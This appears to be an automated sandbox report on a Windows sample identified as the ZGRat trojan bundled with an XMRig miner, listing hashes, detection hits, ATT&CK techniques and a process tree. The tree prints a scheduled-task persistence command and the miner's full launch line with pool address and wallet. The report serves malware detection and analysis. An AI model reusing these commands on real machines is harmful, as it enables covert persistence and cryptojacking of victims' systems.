xmrig | 458278fff0ef4dc89dbb774d8ef79bbd91e6390182e1dee60a534583f425b11b

General

Target

tmp.exe
Size

4.3MB
MD5

dc101ebccce8a5d7f83b4b6ae5d49178
SHA1

0e049dce0518d7f45077202de084610e51bc0ace
SHA256

458278fff0ef4dc89dbb774d8ef79bbd91e6390182e1dee60a534583f425b11b
SHA512

29749129569b804d12b4af4a2de8b3d8be104c915ac1061ce8cd8c9e33856f3e40ccc5fa121324aa5b70ce7582def95adf4c1e1a2177894ddbe10341a09b39b7
SSDEEP

98304:k1CxiKNDAMrWXrm+G/Mul2rq/aReDkizMeQUD1:+CxiLOUr6/Mul2rVe4iwVUD1

Score

10^/10

xmrig zgrat miner rat upx

Malware Config

Signatures

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2120-0-0x0000000000510000-0x0000000000954000-memory.dmp	family_zgrat_v1
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	family_zgrat_v1
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1164-23-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-24-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-30-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-28-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-32-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-33-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1164-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/memory/2120-0-0x0000000000510000-0x0000000000954000-memory.dmp	net_reactor
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	net_reactor
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe	net_reactor

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation .exe
Executes dropped EXE 1 IoCs

Processes:

.exe

pid process

5092 .exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	.exe

pid	process
5092	.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1164-19-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-21-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-22-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-23-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-24-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-33-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1164-41-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4916 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4688 timeout.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

.exe

pid process

5092 .exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

tmp.exe.exe

description pid process

Token: SeDebugPrivilege 2120 tmp.exe
Token: SeDebugPrivilege 5092 .exe

pid	process
4916	schtasks.exe

pid	process
4688	timeout.exe

pid	process
5092	.exe

description	pid	process
Token: SeDebugPrivilege	2120	tmp.exe
Token: SeDebugPrivilege	5092	.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

tmp.execmd.exe.execmd.exe

description	pid	process	target process
PID 2120 wrote to memory of 4060	2120	tmp.exe	cmd.exe
PID 2120 wrote to memory of 4060	2120	tmp.exe	cmd.exe
PID 4060 wrote to memory of 4688	4060	cmd.exe	timeout.exe
PID 4060 wrote to memory of 4688	4060	cmd.exe	timeout.exe
PID 4060 wrote to memory of 5092	4060	cmd.exe	.exe
PID 4060 wrote to memory of 5092	4060	cmd.exe	.exe
PID 5092 wrote to memory of 2504	5092	.exe	cmd.exe
PID 5092 wrote to memory of 2504	5092	.exe	cmd.exe
PID 2504 wrote to memory of 4916	2504	cmd.exe	schtasks.exe
PID 2504 wrote to memory of 4916	2504	cmd.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6E79.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:4688

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
- Creates scheduled task(s)
PID:4916

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
4⤵
PID:1164

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:1420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
2⤵
PID:2076

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

1

T1064

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
Filesize
459KB

MD5
f6e419b65af985fb0606b36d970076b5

SHA1
875c9798b34743469ad665e3523ff5b54f8f3be0

SHA256
dd82c5042c96aea871f2ebd47cc0fe27ff9e9f56f74885ea5e3c31f883caaa17

SHA512
520010df278e981e9b8e3d3161eba803eea952414baee0f02b2f1e22eb62992f7c9af970356c6c99fdc1cbf92d509a0486e4aed0366cdf8ae7a567f24784a178

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
Filesize
534KB

MD5
718dca21ad5b2033c8c4e2bda6eb0cde

SHA1
267020877b32150ad77dba408108941cf2e4514f

SHA256
3feb8f0c5b9ea6ff2922fc37fd54fc3b34d206ef5e63043fda07530e3dea9af1

SHA512
68bc66d803e4e19cacffecd38bc6755c895d2b7cc4dbca9d0e9bf98f7608a16361c57838af8e4dc709f6387d9f7e2ec9d041260fb4fec5b9d892b0c1985b7e6b

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
Filesize
89KB

MD5
fdeeb762ca5de7f293ef5bcdb390b9cd

SHA1
9b809be87ca8a8ea6a0e9f56496e380f8ce7adaa

SHA256
1de7489e441542db4ab0324756d62efda49986fd7439a78e5f193f75707aa2ca

SHA512
99485e109f99602e904a26f764f89d699d7158470410bf0aff71d082e8559113d08a340a84e0dbddffe3fec532ff1f1f66a797af1598c6ee93f471217a69fc1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log
Filesize
1KB

MD5
e3da8eae01f57153845d1533b6bed268

SHA1
a235712a631c52d2853e9136d9c4431358f34fd2

SHA256
77507c05c8131f73d1dd1500992223819a6ab09cd820716e00bf907c9c7fc857

SHA512
b24b1064f8270981746f49a1b56a1aab21f7985af672bc6dcdbd67e498033714131ba4581c9c3d934e86b56d904bb0ecf322fae498133bbb9cb3a68ea6cad9d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6E79.tmp.bat
Filesize
168B

MD5
374919347d756512538be1e5840d795b

SHA1
b9c5dd651dea214c788e2a7706aa9ec6aae6f2e6

SHA256
fd050357584bd5f23c40c3e722f521ebe3451007648f32ab5af2a06a67c5f080

SHA512
559792b935b2b8c235ee42edeef838325b5f84a9c77a8f83e79fc1b073f219e0ade1b999532ea7a144a759150684ba06b4876d41e6d493e4dfa64874e5119cbf

Download Submit
memory/1164-37-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-43-0x000002A60ABC0000-0x000002A60ABE0000-memory.dmp

Filesize
128KB

Download
memory/1164-42-0x000002A60ABA0000-0x000002A60ABC0000-memory.dmp

Filesize
128KB

Download
memory/1164-41-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-38-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-40-0x000002A60ABC0000-0x000002A60ABE0000-memory.dmp

Filesize
128KB

Download
memory/1164-39-0x000002A60ABA0000-0x000002A60ABC0000-memory.dmp

Filesize
128KB

Download
memory/1164-19-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-21-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-22-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-26-0x000002A60AB00000-0x000002A60AB20000-memory.dmp

Filesize
128KB

Download
memory/1164-24-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-32-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1164-34-0x000002A60AB40000-0x000002A60AB80000-memory.dmp

Filesize
256KB

Download
memory/1164-33-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1420-47-0x0000000001E50000-0x0000000001E60000-memory.dmp

Filesize
64KB

Download
memory/1420-48-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

Filesize
4KB

Download
memory/1420-46-0x00007FFBE5710000-0x00007FFBE61D1000-memory.dmp

Filesize
10.8MB

Download
memory/2120-3-0x00000000012F0000-0x00000000012F1000-memory.dmp

Filesize
4KB

Download
memory/2120-0-0x0000000000510000-0x0000000000954000-memory.dmp

Filesize
4.3MB

Download
memory/2120-10-0x00007FFBE5710000-0x00007FFBE61D1000-memory.dmp

Filesize
10.8MB

Download
memory/2120-1-0x00007FFBE5710000-0x00007FFBE61D1000-memory.dmp

Filesize
10.8MB

Download
memory/2120-2-0x000000001C5B0000-0x000000001C5C0000-memory.dmp

Filesize
64KB

Download
memory/5092-18-0x0000000001250000-0x0000000001260000-memory.dmp

Filesize
64KB

Download
memory/5092-14-0x00007FFBE53E0000-0x00007FFBE5EA1000-memory.dmp

Filesize
10.8MB

Download
memory/5092-16-0x0000000001100000-0x0000000001101000-memory.dmp

Filesize
4KB

Download
memory/5092-15-0x0000000001250000-0x0000000001260000-memory.dmp

Filesize
64KB

Download
memory/5092-17-0x00007FFBE53E0000-0x00007FFBE5EA1000-memory.dmp

Filesize
10.8MB

Download
memory/5092-25-0x00007FFBE53E0000-0x00007FFBE5EA1000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads